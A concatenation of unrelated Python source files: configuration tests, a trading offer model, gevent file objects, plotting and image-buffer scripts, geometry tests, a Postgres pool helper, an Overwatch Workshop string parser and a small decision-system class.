assert set(o.name for o in X.options) == {'foo'}
def test_constructor():
class X(Configuration):
foo = option(int)
conf = X(foo=0)
assert conf.foo == 0
with pytest.raises(TypeError, message="expected TypeError (no arguments)"):
assert X()
with pytest.raises(TypeError, message="expected TypeError (positional arguments are disallowed)"):
assert X(0)
with pytest.raises(TypeError, message="expected TypeError (erroneous property 'bar')"):
assert X(foo=0, bar=1)
class X(Configuration):
foo = option(int)
bar = option(int)
conf = X(foo=0, bar=1)
assert conf.foo == 0
assert conf.bar == 1
def test_hash():
class X(Configuration):
foo = option(int)
class Y(Configuration):
foo = option(int)
c1 = X(foo=0)
c2 = X(foo=1)
c3 = X(foo=0)
c4 = X(foo=1)
s = {c1, c2, c3, c4}
assert s == {X(foo=0), X(foo=1)}
c5 = Y(foo=0)
assert len({c1, c5}) == 2
with pytest.raises(Exception):
assert c1 != c5
def test_is_frozen():
class X(Configuration):
foo = option(int)
conf = X(foo=0)
with pytest.raises(AttributeError, message="expected AttributeError (can't set foo)"):
conf.foo = 10
def test_eq():
class X(Configuration):
foo = option(int)
bar = option(int)
class Y(Configuration):
foo = option(int)
bar = option(int)
assert X(foo=1, bar=2) == X(foo=1, bar=2)
assert X(foo=1, bar=2) != X(foo=2, bar=2)
assert X(foo=1, bar=2) != X(foo=1, bar=1)
with pytest.raises(Exception, message="expected Exception (confs have different parent classes)"):
assert X(foo=1, bar=2) == Y(foo=1, bar=2)
def test_to_and_from_dict():
class X(Configuration):
foo = option(int)
bar = option(int)
conf = X(foo=1, bar=2)
jsn = {'foo': 1, 'bar': 2}
assert conf.to_dict() == jsn
assert X.from_dict(jsn) == conf
|
from enum import Enum
from eth_utils import int_to_big_endian
from raidex.raidex_node.architecture.event_architecture import dispatch_events
from raidex.utils import pex
from raidex.utils.timestamp import to_str_repr, time_plus
from raidex.utils.random import create_random_32_bytes_id
from raidex.raidex_node.commitment_service.events import CommitEvent, CommitmentProvedEvent, ReceivedInboundEvent, CancellationRequestEvent
class TraderRole(Enum):
MAKER = 0
TAKER = 1
class OfferType(Enum):
BUY = 0
SELL = 1
@classmethod
def opposite(cls, type_):
return OfferType((type_.value + 1) % 2)
class BasicOffer:
def __init__(self, offer_id, offer_type, base_amount, quote_amount, timeout_date):
self.offer_id = offer_id
self.type = offer_type
self.base_amount = base_amount
self.quote_amount = quote_amount
self.timeout_date = timeout_date
@property
def price(self):
return float(self.quote_amount) / self.base_amount
def __repr__(self):
return "Offer<pex(id)={} amount={} price={} type={} timeout={}>".format(
pex(int_to_big_endian(self.offer_id)),
self.base_amount,
self.price,
self.type,
to_str_repr(self.timeout_date))
def __eq__(self, other):
if not isinstance(other, BasicOffer):
return False
if not self.offer_id == other.offer_id:
return False
if not self.type == other.type:
return False
if not self.base_amount == other.base_amount:
return False
if not self.quote_amount == other.quote_amount:
return False
if not self.timeout_date == other.timeout_date:
return False
return True
class Offer(BasicOffer):
def __init__(self, offer_id, offer_type, base_amount, quote_amount, timeout_date, trader_role):
super(Offer, self).__init__(offer_id, offer_type, base_amount, quote_amount, timeout_date)
self.trader_role = trader_role
self.proof = None
@property
def buy_amount(self):
if self.is_buy():
return self.base_amount
return self.quote_amount
@property
def sell_amount(self):
if self.is_buy():
return self.quote_amount
return self.base_amount
def is_maker(self):
if self.trader_role == TraderRole.MAKER:
return True
return False
def is_buy(self):
if self.type == OfferType.BUY:
return True
return False
def is_sell(self):
return not self.is_buy()
@property
def has_proof(self):
if self.proof:
return True
return False
def on_enter_unproved(self):
dispatch_events([CommitEvent(offer=self)])
def set_proof(self, proof):
self.proof = proof
def on_enter_published(self):
dispatch_events([CommitmentProvedEvent(offer=self)])
def initiate_refund(self, raiden_event):
dispatch_events([ReceivedInboundEvent(offer=self, raiden_event=raiden_event)])
def on_enter_cancellation(self):
dispatch_events([CancellationRequestEvent(offer=self)])
def log_state(self, *args):
if hasattr(self, 'state'):
print(f'Offer {self.offer_id} - State Changed to: {self.state}')
if hasattr(self, 'status'):
print(f'Status: {self.status}')
class OfferFactory:
@staticmethod
def create_offer(offer_type, base_amount, quote_amount, offer_lifetime, trader_role):
new_offer_id = create_random_32_bytes_id()
timeout_date = time_plus(seconds=offer_lifetime)
offer_model = Offer(new_offer_id,
offer_type,
base_amount,
quote_amount,
timeout_date,
trader_role)
from raidex.raidex_node.order import fsm_offer
fsm_offer.add_model(offer_model)
return offer_model
@staticmethod
def create_from_basic(offer, trader_role):
offer_model = Offer(offer.offer_id,
offer.type,
offer.base_amount,
offer.quote_amount,
offer.timeout_date,
trader_role)
from raidex.raidex_node.order import fsm_offer
fsm_offer.add_model(offer_model)
return offer_model
|
from __future__ import absolute_import, with_statement
import sys
import os
from gevent.hub import get_hub
from gevent.socket import EBADF
from gevent.os import _read, _write, ignored_errors
from gevent.lock import Semaphore, DummySemaphore
try:
from fcntl import fcntl, F_SETFL
except ImportError:
fcntl = None
__all__ = ['FileObjectPosix',
'FileObjectThread',
'FileObject']
if fcntl is None:
__all__.remove('FileObjectPosix')
else:
from gevent.socket import _fileobject, _get_memory
cancel_wait_ex = IOError(EBADF, 'File descriptor was closed in another greenlet')
from gevent.os import make_nonblocking
try:
from gevent._util import SocketAdapter__del__, noop
except ImportError:
SocketAdapter__del__ = None
noop = None
from types import UnboundMethodType
class NA(object):
def __repr__(self):
return 'N/A'
NA = NA()
class SocketAdapter(object):
"""Socket-like API on top of a file descriptor.
The main purpose of it is to re-use _fileobject to create proper cooperative file objects
from file descriptors on POSIX platforms.
"""
def __init__(self, fileno, mode=None, close=True):
if not isinstance(fileno, (int, long)):
raise TypeError('fileno must be int: %r' % fileno)
self._fileno = fileno
self._mode = mode or 'rb'
self._close = close
self._translate = 'U' in self._mode
make_nonblocking(fileno)
self._eat_newline = False
self.hub = get_hub()
io = self.hub.loop.io
self._read_event = io(fileno, 1)
self._write_event = io(fileno, 2)
def __repr__(self):
if self._fileno is None:
return '<%s at 0x%x closed>' % (self.__class__.__name__, id(self))
else:
args = (self.__class__.__name__, id(self), getattr(self, '_fileno', NA), getattr(self, '_mode', NA))
return '<%s at 0x%x (%r, %r)>' % args
def makefile(self, *args, **kwargs):
return _fileobject(self, *args, **kwargs)
def fileno(self):
result = self._fileno
if result is None:
raise IOError(EBADF, 'Bad file descriptor (%s object is closed)' % self.__class__.__name)
return result
def detach(self):
x = self._fileno
self._fileno = None
return x
def close(self):
self.hub.cancel_wait(self._read_event, cancel_wait_ex)
self.hub.cancel_wait(self._write_event, cancel_wait_ex)
fileno = self._fileno
if fileno is not None:
self._fileno = None
if self._close:
os.close(fileno)
def sendall(self, data):
fileno = self.fileno()
bytes_total = len(data)
bytes_written = 0
while True:
try:
bytes_written += _write(fileno, _get_memory(data, bytes_written))
except (IOError, OSError):
code = sys.exc_info()[1].args[0]
if code not in ignored_errors:
raise
sys.exc_clear()
if bytes_written >= bytes_total:
return
self.hub.wait(self._write_event)
def recv(self, size):
while True:
try:
data = _read(self.fileno(), size)
except (IOError, OSError):
code = sys.exc_info()[1].args[0]
if code not in ignored_errors:
raise
sys.exc_clear()
else:
if not self._translate or not data:
return data
if self._eat_newline:
self._eat_newline = False
if data.startswith('\n'):
data = data[1:]
if not data:
return self.recv(size)
if data.endswith('\r'):
self._eat_newline = True
return self._translate_newlines(data)
self.hub.wait(self._read_event)
def _translate_newlines(self, data):
data = data.replace("\r\n", "\n")
data = data.replace("\r", "\n")
return data
if not SocketAdapter__del__:
def __del__(self, close=os.close):
fileno = self._fileno
if fileno is not None:
close(fileno)
if SocketAdapter__del__:
SocketAdapter.__del__ = UnboundMethodType(SocketAdapter__del__, None, SocketAdapter)
class FileObjectPosix(_fileobject):
def __init__(self, fobj, mode='rb', bufsize=-1, close=True):
if isinstance(fobj, (int, long)):
fileno = fobj
fobj = None
else:
fileno = fobj.fileno()
sock = SocketAdapter(fileno, mode, close=close)
self._fobj = fobj
self._closed = False
_fileobject.__init__(self, sock, mode=mode, bufsize=bufsize, close=close)
def __repr__(self):
if self._sock is None:
return '<%s closed>' % self.__class__.__name__
elif self._fobj is None:
return '<%s %s>' % (self.__class__.__name__, self._sock)
else:
return '<%s %s _fobj=%r>' % (self.__class__.__name__, self._sock, self._fobj)
def close(self):
if self._closed:
# make sure close() is only ran once when called concurrently
# cannot rely on self._sock for this because we need to keep that until flush() is done
return
self._closed = True
sock = self._sock
if sock is None:
return
try:
self.flush()
finally:
if self._fobj is not None or not self._close:
sock.detach()
self._sock = None
self._fobj = None
def __getattr__(self, item):
assert item != '_fobj'
if self._fobj is None:
raise FileObjectClosed
return getattr(self._fobj, item)
if not noop:
def __del__(self):
# disable _fileobject's __del__
pass
if noop:
FileObjectPosix.__del__ = UnboundMethodType(FileObjectPosix, None, noop)
class FileObjectThread(object):
def __init__(self, fobj, *args, **kwargs):
self._close = kwargs.pop('close', True)
self.threadpool = kwargs.pop('threadpool', None)
self.lock = kwargs.pop('lock', True)
if kwargs:
raise TypeError('Unexpected arguments: %r' % kwargs.keys())
if self.lock is True:
self.lock = Semaphore()
elif not self.lock:
self.lock = DummySemaphore()
if not hasattr(self.lock, '__enter__'):
raise TypeError('Expected a Semaphore or boolean, got %r' % type(self.lock))
if isinstance(fobj, (int, long)):
if not self._close:
# we cannot do this, since fdopen object will close the descriptor
raise TypeError('FileObjectThread does not support close=False')
fobj = os.fdopen(fobj, *args)
self._fobj = fobj
if self.threadpool is None:
self.threadpool = get_hub().threadpool
def _apply(self, func, args=None, kwargs=None):
with self.lock:
return self.threadpool.apply_e(BaseException, func, args, kwargs)
def close(self):
fobj = self._fobj
if fobj is None:
return
self._fobj = None
try:
self.flush(_fobj=fobj)
finally:
if self._close:
fobj.close()
def flush(self, _fobj=None):
if _fobj is not None:
fobj = _fobj
else:
fobj = self._fobj
if fobj is None:
raise FileObjectClosed
return self._apply(fobj.flush)
def __repr__(self):
return '<%s _fobj=%r threadpool=%r>' % (self.__class__.__name__, self._fobj, self.threadpool)
def __getattr__(self, item):
assert item != '_fobj'
if self._fobj is None:
raise FileObjectClosed
return getattr(self._fobj, item)
for method in ['read', 'readinto', 'readline', 'readlines', 'write', 'writelines', 'xreadlines']:
exec '''def %s(self, *args, **kwargs):
fobj = self._fobj
if fobj is None:
raise FileObjectClosed
return self._apply(fobj.%s, args, kwargs)
''' % (method, method)
def __iter__(self):
return self
def next(self):
line = self.readline()
if line:
return line
raise StopIteration
FileObjectClosed = IOError(EBADF, 'Bad file descriptor (FileObject was closed)')
try:
FileObject = FileObjectPosix
except NameError:
FileObject = FileObjectThread
class FileObjectBlock(object):
def __init__(self, fobj, *args, **kwargs):
self._close = kwargs.pop('close', True)
if kwargs:
raise TypeError('Unexpected arguments: %r' % kwargs.keys())
if isinstance(fobj, (int, long)):
if not self._close:
# we cannot do this, since fdopen object will close the descriptor
raise TypeError('FileObjectBlock does not support close=False')
fobj = os.fdopen(fobj, *args)
self._fobj = fobj
def __repr__(self):
return '<%s %r>' % (self._fobj, )
def __getattr__(self, item):
assert item != '_fobj'
if self._fobj is None:
raise FileObjectClosed
return getattr(self._fobj, item)
config = os.environ.get('GEVENT_FILE')
if config:
klass = {'thread': 'gevent.fileobject.FileObjectThread',
'posix': 'gevent.fileobject.FileObjectPosix',
'block': 'gevent.fileobject.FileObjectBlock'}.get(config, config)
if klass.startswith('gevent.fileobject.'):
FileObject = globals()[klass.split('.', 2)[-1]]
else:
from gevent.hub import _import
FileObject = _import(klass)
del klass
|
import urllib.request
import time
def check_website(website, timeout=30):
startTime = time.time()
while time.time() - startTime <= timeout:
try:
print(urllib.request.urlopen(website).getcode())
return True
except:
pass
return False
if __name__ == "__main__":
website = "https://www.stackoverflow.com"
plugin_website = "http://127.0.0.1:8051/"
print(check_website(plugin_website, timeout=120))
|
from rest_framework import serializers
from lotus_dashboard.models import *
class DashboardColumnSerializer(serializers.ModelSerializer):
class Meta:
model = DashboardColumn
fields = ('id', 'site', 'columns')
class CapUpdateResultSerializer(serializers.ModelSerializer):
class Meta:
model = CapUpdateResult
fields = ('id', 'from_date', 'to_date', 'crm', 'result', 'updated_at')
class OfferSerializer(serializers.ModelSerializer):
class Meta:
model = Offer
fields = ('id', 'crm', 'name', 'label', 'type', 's1_payout', 's2_payout', 'step1')
class AffiliateSerializer(serializers.ModelSerializer):
class Meta:
model = Affiliate
fields = ('id', 'name', 'afid', 'code', 'bot')
class BillingAffiliateSerializer(serializers.ModelSerializer):
class Meta:
model = BillingAffiliate
fields = ('id', 'name', 'afid')
|
"""
Given a logfile, plot a graph
"""
import json
import argparse
from collections import defaultdict
import matplotlib.pyplot as plt
import numpy as np
plt.switch_backend('agg')
def plot_value(logfile, min_y, max_y, title, max_x, value_key, out_file):
epoch = []
reward = []
with open(logfile, 'r') as f:
for n, line in enumerate(f):
if n == 0:
line = line.replace('meta: ', '').strip()
meta = json.loads(line)
continue # skip first line
line = line.strip()
if line == '':
continue
d = json.loads(line)
if max_x is not None and d['episode'] > max_x:
continue
epoch.append(int(d['episode']))
v = float(d[value_key])
if 'version' not in d:
v /= meta['batch_size']
reward.append(v)
while len(epoch) > 200:
new_epoch = []
new_reward = []
for n in range(len(epoch) // 2):
r = (reward[n * 2] + reward[n * 2 + 1]) / 2
e = epoch[n] * 2
new_epoch.append(e)
new_reward.append(r)
epoch = new_epoch
reward = new_reward
if min_y is None:
min_y = 0
if max_y is not None:
plt.ylim([min_y, max_y])
plt.plot(np.array(epoch), reward, label=value_key)
if title is not None:
plt.title(title)
else:
plt.title(f'{value_key} food={meta["enable_food"]} cactus={meta["enable_cactus"]}')
plt.xlabel('Episode')
plt.ylabel(value_key)
plt.legend()
plt.savefig(out_file)
def plot_multiple_files(logfiles, min_y, max_y, title, label, max_x, value_key, out_file):
for logfile in logfiles.split(','):
epoch = []
reward = []
with open(logfile, 'r') as f:
for n, line in enumerate(f):
if n == 0:
line = line.replace('meta: ' ,'')
print('line', line)
meta = json.loads(line)
print('meta', meta)
continue
line = line.strip()
if line == '':
continue
d = json.loads(line)
if max_x is not None and d['episode'] > max_x:
continue
epoch.append(int(d['episode']))
reward.append(float(d[value_key]))
while len(epoch) > 200:
new_epoch = []
new_reward = []
for n in range(len(epoch) // 2):
r = (reward[n * 2] + reward[n * 2 + 1]) / 2
e = epoch[n] * 2
new_epoch.append(e)
new_reward.append(r)
epoch = new_epoch
reward = new_reward
if min_y is None:
min_y = 0
if max_y is not None:
plt.ylim([min_y, max_y])
plt.plot(np.array(epoch) / 1000, reward, label=label.format(**meta))
if title is not None:
plt.title(title)
plt.xlabel('Episodes of 128 games (thousands)')
plt.ylabel(value_key.replace('_', ' '))
plt.legend()
plt.savefig(out_file)
def plot_multiple_keys(logfile, title, step_key, value_keys, out_file):
# epoch = []
rows = []
with open(logfile, 'r') as f:
for n, line in enumerate(f):
if n == 0:
line = line.replace('meta: ', '').strip()
meta = json.loads(line)
continue # skip first line
line = line.strip()
if line == '':
continue
d = json.loads(line)
rows.append(d)
average_over = 1
while len(rows) // average_over > 200:
average_over *= 2
print('average_over', average_over)
averaged_rows = []
summed_row = {}
this_count = 0
epochs = []
value_keys = value_keys.split(',')
# this_epoch = rows[0]['episode']
for row in rows:
for k in value_keys:
if k not in summed_row:
epoch = row[step_key]
summed_row[k] = row[k]
else:
summed_row[k] += row[k]
this_count += 1
if this_count >= average_over:
averaged_row = {}
for k, v in summed_row.items():
averaged_row[k] = summed_row[k] / average_over
averaged_rows.append(averaged_row)
epochs.append(epoch)
summed_row = {}
this_count = 0
values_by_key = defaultdict(list)
for row in averaged_rows:
for k in value_keys:
# print('values_by_key[k]', values_by_key[k])
# print('row', row)
# print('row[k]', row[k])
values_by_key[k].append(row[k])
# max_by_key = {}
# min_by_key = {}
# for key, values in values_by_key.items():
# max_by_key[key] = np.max(values)
# min_by_key[key] = np.min(values)
# print('max_by_key', max_by_key)
# for key, values in values_by_key.items():
# # if max_by_key[key] > 0:
# this_max = max_by_key[key]
# this_min = min_by_key[key]
# new_values = [(v - this_min) / (this_max - this_min) for v in values]
# values_by_key[key] = new_values
# for k in value_keys:
# plt.plot(np.array(epochs), values_by_key[k], label=k)
# if title is not None:
# plt.title(title)
for i, k in enumerate(value_keys):
print(i, k)
plt.subplot(len(value_keys), 1, i + 1)
plt.plot(np.array(epochs), values_by_key[k], label=k)
plt.xlabel(step_key)
plt.ylabel(k)
plt.legend()
plt.savefig(out_file)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parsers = parser.add_subparsers()
parser_ = parsers.add_parser('plot-value')
parser_.add_argument('--logfile', type=str, required=True)
parser_.add_argument('--max-x', type=int)
parser_.add_argument('--min-y', type=float)
parser_.add_argument('--max-y', type=float)
parser_.add_argument('--value-key', type=str, default='average_reward')
parser_.add_argument('--title', type=str)
parser_.set_defaults(func=plot_value)
parser_ = parsers.add_parser('plot-multiple-files')
parser_.add_argument('--logfiles', type=str, required=True)
parser_.add_argument('--max-x', type=int)
parser_.add_argument('--min-y', type=float)
parser_.add_argument('--max-y', type=float)
parser_.add_argument('--label', type=str, default='tau={tau}')
parser_.add_argument('--value-key', type=str, default='average_reward')
parser_.add_argument('--out-file', type=str, default='/tmp/out-{value_key}.png')
parser_.add_argument('--title', type=str)
parser_.set_defaults(func=plot_multiple_files)
parser_ = parsers.add_parser('plot-multiple-keys')
parser_.add_argument('--logfile', type=str, required=True)
parser_.add_argument('--step-key', type=str, default='episode')
parser_.add_argument('--value-keys', type=str, default='average_reward')
parser_.add_argument('--out-file', type=str, default='tmp_plots/out.png')
parser_.add_argument('--title', type=str)
parser_.set_defaults(func=plot_multiple_keys)
args = parser.parse_args()
func = args.func
args_dict = args.__dict__
args.out_file = args.out_file.format(**args.__dict__)
del args_dict['func']
func(**args_dict)
|
#!/usr/bin/env python
import OpenImageIO as oiio
# Print the contents of an ImageSpec
def print_imagespec (spec, subimage=0, mip=0, msg="") :
if msg != "" :
print str(msg)
if spec.depth <= 1 :
print (" resolution %dx%d%+d%+d" % (spec.width, spec.height, spec.x, spec.y))
else :
print (" resolution %dx%d%x%d+d%+d%+d" % (spec.width, spec.height, spec.depth, spec.x, spec.y, spec.z))
if (spec.width != spec.full_width or spec.height != spec.full_height
or spec.depth != spec.full_depth) :
if spec.full_depth <= 1 :
print (" full res %dx%d%+d%+d" % (spec.full_width, spec.full_height, spec.full_x, spec.full_y))
else :
print (" full res %dx%d%x%d+d%+d%+d" % (spec.full_width, spec.full_height, spec.full_depth, spec.full_x, spec.full_y, spec.full_z))
if spec.tile_width :
print (" tile size %dx%dx%d" % (spec.tile_width, spec.tile_height, spec.tile_depth))
else :
print " untiled"
if mip >= 1 :
return
print " " + str(spec.nchannels), "channels:", spec.channelnames
print " format = ", str(spec.format)
if spec.channelformats :
print " channelformats = ", spec.channelformats
print " alpha channel = ", spec.alpha_channel
print " z channel = ", spec.z_channel
print " deep = ", spec.deep
for i in range(len(spec.extra_attribs)) :
if type(spec.extra_attribs[i].value) == str :
print " ", spec.extra_attribs[i].name, "= \"" + spec.extra_attribs[i].value + "\""
else :
print " ", spec.extra_attribs[i].name, "=", spec.extra_attribs[i].value
######################################################################
# main test starts here
try:
print "Constructing to be a writeable 320x240,4 UINT16:"
b = oiio.ImageBuf (oiio.ImageSpec(320,240,4,oiio.UINT16))
print_imagespec (b.spec())
print "Resetting to be a writeable 640x480,3 Float:"
b.reset (oiio.ImageSpec(640,480,3,oiio.FLOAT))
print_imagespec (b.spec())
print ""
# Test reading from disk
print "Testing read of grid.tx:"
b = oiio.ImageBuf ("../../../../../oiio-images/grid.tx")
print "subimage:", b.subimage, " / ", b.nsubimages
print "miplevel:", b.miplevel, " / ", b.nmiplevels
print "channels:", b.nchannels
print "name:", b.name
print "file_format_name:", b.file_format_name
print "deep:", b.deep
print "orientation:", b.orientation
print "oriented x,y,width,height:", b.oriented_x, b.oriented_y, b.oriented_width, b.oriented_height
print "oriented full x,y,width,height:", b.oriented_full_x, b.oriented_full_y, b.oriented_full_width, b.oriented_full_height
print "xyz beg/end:", b.xbegin, b.xend, b.ybegin, b.yend, b.zbegin, b.zend
print "xyz min/max:", b.xmin, b.xmax, b.ymin, b.ymax, b.zmin, b.zmax
print "setting full res..."
b.set_full (0, 2048, 0, 2048, 0, 1)
print "roi =", b.roi
print "full roi =", b.roi_full
print "setting full roi again, as ROI..."
b.roi_full = oiio.ROI(0, 1024, 0, 1024, 0, 1, 0, b.nchannels)
print "Printing the whole spec to be sure:"
print_imagespec (b.spec())
print ""
print "Resetting to a different MIP level:"
b.reset ("../../../../../oiio-images/grid.tx", 0, 2)
print_imagespec (b.spec())
print ""
# Create a small buffer, do various pixel reads and writes
print "Making 2x2 RGBK image:"
b = oiio.ImageBuf (oiio.ImageSpec(2,2,3,oiio.UINT8))
print_imagespec (b.spec())
b.setpixel (0, 0, 0, (1.0, 0.0, 0.0))
b.setpixel (1, 0, 0, (0.0, 1.0, 0.0))
b.setpixel (0, 1, 0, (0.0, 0.0, 1.0))
b.setpixel (1, 1, 0, (0.0, 0.0, 0.0))
print "Pixel 0,0 is", b.getpixel(0,0,0)
print "Pixel 1,0 is", b.getpixel(1,0) # test 2D lookup
print "Pixel 0,1 is", b.getpixel(0,1)
print "Interpolating 1,0.5 ->", b.interppixel(1,0.5)
print "Interpolating NDC 0.25,0.5 ->", b.interppixel_NDC(0.25,0.5)
print ""
print "Saving file..."
b.write ("out.tif")
print "Done."
except Exception as detail:
print "Unknown exception:", detail
|
from unittest import TestCase
from phi import math, geom
from phi.geom import Box, Sphere
from phi.math import batch, channel, spatial
class TestGeom(TestCase):
def test_box_constructor(self):
box = Box(0, (1, 1))
math.assert_close(box.size, 1)
self.assertEqual(math.spatial(x=1, y=1), box.shape)
def test_box_batched(self):
box = Box(math.tensor([(0, 0), (1, 1)], batch('boxes'), channel('vector')), 1)
self.assertEqual(math.batch(boxes=2) & spatial(x=1, y=1), box.shape)
def test_box_volume(self):
box = Box(math.tensor([(0, 0), (1, 1)], batch('boxes'), channel('vector')), 1)
math.assert_close(box.volume, [1, 0])
def test_sphere_volume(self):
sphere = Sphere(math.tensor([(0, 0), (1, 1)], batch('batch'), channel('vector')), radius=math.tensor([1, 2], batch('batch')))
math.assert_close(sphere.volume, [4/3 * math.PI, 4/3 * math.PI * 8])
def test_stack_volume(self):
u = geom.stack([Box[0:1, 0:1], Box[0:2, 0:2]], batch('batch'))
math.assert_close(u.volume, [1, 4])
def test_stack_type(self):
bounds1 = Box[0:1, 0:1]
bounds2 = Box[0:10, 0:10]
bounds = geom.stack([bounds1, bounds2], batch('batch'))
self.assertIsInstance(bounds, Box)
def test_union_same(self):
union = geom.union(Box[0:1, 0:1], Box[2:3, 0:1])
self.assertIsInstance(union, Box)
math.assert_close(union.approximate_signed_distance((0, 0)), union.approximate_signed_distance((3, 1)), 0)
math.assert_close(union.approximate_signed_distance((1.5, 0)), 0.5)
def test_union_varying(self):
box = Box[0:1, 0:1]
sphere = Sphere((0, 0), radius=1)
union = geom.union(box, sphere)
math.assert_close(union.approximate_signed_distance((1, 1)), union.approximate_signed_distance((0, -1)), 0)
|
import numpy as np
import msgpack
def toCameraCoord(pose_mat):
"""
Convert the pose of lidar coordinate to camera coordinate
"""
R_C2L = np.array([[0, 0, 1, 0],
[-1, 0, 0, 0],
[0, -1, 0, 0],
[0, 0, 0, 1]])
inv_R_C2L = np.linalg.inv(R_C2L)
R = np.dot(inv_R_C2L, pose_mat)
rot = np.dot(R, R_C2L)
return rot
def cull_map(map_points, ceiling, floor):
"""
Removes points above the ceiling and below the floor so that when it\'s plotted in the horizontal plane points on
the ceiling and floor get cut out for a cleaner map
:param floor: Threshold below which map points will be removed
:param ceiling: Threshold above which map points will be removed
:param map_points: Point cloud
:return: culled map
"""
culled_map = []
for i in range(len(map_points)):
point = map_points[i]
if ceiling > point[1] > floor:
culled_map.append(point)
return culled_map
def load_map(map_path):
"""
Loads the map for use in the report generation
:param: map_path path to the map.msg file
:returns: map
"""
# Read file as binary and unpack data using MessagePack library
with open(map_path, "rb") as f:
data = msgpack.unpackb(f.read(), use_list=False, raw=False)
# The point data is tagged "landmarks"
landmarks = data["landmarks"]
map_points_list = []
for _, point in landmarks.items():
map_points_list.append(np.block([np.asarray(point["pos_w"]), 1.0]))
# y is in the down direction so we flip it
map_points = np.asfarray(map_points_list) * np.array([1, -1, 1, 1])
return map_points
def load_poses(file_name, toCameraCoord = False):
"""
Each line in the file should follow the following structure
pose(3x4 matrix in terms of 12 numbers)
:param file_name: Path to file
:param toCameraCoord: Whether to convert to camera coordinates
:return: Numpy array of trajectory points n x [x, y, z]
"""
f = open(file_name, 'r')
s = f.readlines()
f.close()
poses = []
for cnt, line in enumerate(s):
P = np.eye(4)
line_split = [float(i) for i in line.split()]
for row in range(3):
for col in range(4):
P[row, col] = line_split[row * 4 + col]
if toCameraCoord:
poses.append(toCameraCoord(P))
else:
poses.append(P)
trajectory = np.asarray(poses)
# y is in the down direction so we flip it
trajectory = trajectory[:, :, 3] * np.array([1, -1, 1, 1])
return trajectory
|
from contextlib import contextmanager
from urllib.parse import urlparse
import psycopg2
import psycopg2.extras
from psycopg2.pool import ThreadedConnectionPool
POOL = None
def setup(url):
global POOL
u = urlparse(url)
POOL = ThreadedConnectionPool(1, 20,
database=u.path[1:],
user=u.username,
password=u.password,
host=u.hostname,
port=u.port)
# initialize DB schema
with open('./db/schema.sql', 'r') as f:
schema = f.read()
with cursor(True) as cur:
cur.execute(schema)
@contextmanager
def cursor(commit=False):
global POOL
assert POOL is not None, 'use db.setup() before calling db.cursor()'
connection = None
try:
connection = POOL.getconn()
cur = connection.cursor(cursor_factory=psycopg2.extras.RealDictCursor)
try:
yield cur
if commit:
connection.commit()
finally:
cur.close()
finally:
POOL.putconn(connection)
|
#String Building algorithm for the Overwatch Workshop
#
#Heavily inspired by Deltins ParseString algorithm
#https://github.com/ItsDeltin/Overwatch-Script-To-Workshop/blob/91f6d89cae2dda77d40139a589c22077def7654f/Deltinteger/Deltinteger/Elements/Values.cs#L729
#Parts copied are used with permission.
import logging
import re
class StringParser():
SYMBOLS = "-></*-+=()!?"
PARAM_REPLACE_RE = re.compile("(\\\\{[0-9]+?\\\\})")
PARAM_MATCH_RE = re.compile("^\\{([0-9]+?)\\}")
PARAM_ONLY_RE = re.compile("^\\{([0-9]+?)\\}$")
logger = logging.getLogger("OS.StringParser")
def __init__(self, db_file="res/strings.txt"):
self.words = []
self.us_words = []
if db_file:
self.loadWords(db_file)
def loadWords(self, path):
"""
Load words from a file.
"""
with open(path, "r") as f:
for line in f.readlines():
if line.startswith("//"):
continue
self.words.append(line.strip("\n").lower())
self.sort()
def sort(self):
"""
Sort the internal list of words after
certain criteria.
"""
#Right so I don't have fancy incremental sorting like C# does.
#What I *can* do is split the list into multiple lists, then merge
#TODO: temporary fix
for i in self.words:
if "_" in i:
j = i.replace("_", " ")
self.us_words.append((i, j))
hasParam = []
for i in self.words[:]:
if "{0}" in i:
hasParam.append(i)
self.words.remove(i)
hasParamAndSymbol = []
for i in hasParam[:]:
for char in self.SYMBOLS:
if char in i:
hasParamAndSymbol.append(i)
hasParam.remove(i)
break
hasSymbol = []
for i in self.words[:]:
for char in self.SYMBOLS:
if char in i:
hasSymbol.append(i)
self.words.remove(i)
break
#Sorting key function
def f(x):
return len(x)
hasParam.sort(key=f)
hasParamAndSymbol.sort(key=f)
hasSymbol.sort(key=f)
self.words.sort(key=f)
self.words.extend(hasSymbol)
self.words.extend(hasParam)
self.words.extend(hasParamAndSymbol)
self.words.reverse()
def parse(self, s, params, depth=0):
"""
Parse a string into a value understood by OWW.
s should be an instance of str.
You can specify parameters inside your string using
the {n} syntax. Parameters will be substituted in order
of occurance.
If s contains words or phrases not recognized by the parser,
ValueError is raised.
If params contains more items than s has parameters, the remaining
items are silently dropped.
If params contains less items than s has parameters, TypeError is raised.
The returned value will be a string consisting of one or multiple calls
to the String() OWW function.
"""
final_string = ""
#TODO: temporary fix
if not depth:
for template, phrase in self.us_words:
s = s.replace(phrase, template)
#special case for when the string passed to the parse() method
#is literally just "{n}"
m = self.PARAM_ONLY_RE.fullmatch(s)
if m is not None:
return params[int(m.group(1))]
for template in self.words:
temp_re = "^%s$" % re.sub(self.PARAM_REPLACE_RE, "(.+)", re.escape(template))
self.logger.debug("Testing string template '%s' (-> RE template '%s')..." % (template, temp_re))
match = re.match(temp_re, s)
if match is not None:
try:
self.logger.debug("Match found: %s" % template)
#TODO: Temporary fix
#string_args = ['"%s"' % template]
string_args = ['"%s"' % template.replace("_", " ")]
#check parameters
for group in match.groups():
#is parameter formatted?
self.logger.debug("Parsing group '%s'..." % group)
paramStr = re.fullmatch(self.PARAM_MATCH_RE, group)
if paramStr:
#substitute parameter
try:
string_args.append(params[int(paramStr.group(1))])
except IndexError:
raise TypeError("Not enough arguments to format string.")
else:
#keep parsing
string_args.append(self.parse(group, params))
string_args.extend(["null"] * (4 - len(string_args)))
final_string += "String(%s)" % ", ".join(string_args)
break
except ValueError as e:
self.logger.debug("%s. Trying next template..." % str(e))
continue
else:
raise ValueError("Can't match string '%s': No matching template found." % s)
return final_string
|
import math
import re
from KlasaDecyzyjna import KlasaDecyzyjna
def unique(list1):
unique_list = []
for x in list1:
if x not in unique_list:
unique_list.append(x)
return unique_list
class SystemDecyzyjny:
NUMBER_OF_ATTRIBUTES = 15
def printFile(self):
f = open(self)
print(f.read())
def getNumericAttributes(self):
i = 0
array = []
for elem in self:
if "n" in elem:
array.append(i)
i += 1
return array
def minAttributeValue(self, numericAttributes):
for i in numericAttributes:
array = []
for x in range(len(self)):
array.append(self[x][i])
print("attribute", i, "min value", min(array))
def maxAttributeValue(self, numericAttributes):
for i in numericAttributes:
array = []
for x in range(len(self)):
array.append(self[x][i])
print("attribute", i, "max value", max(array))
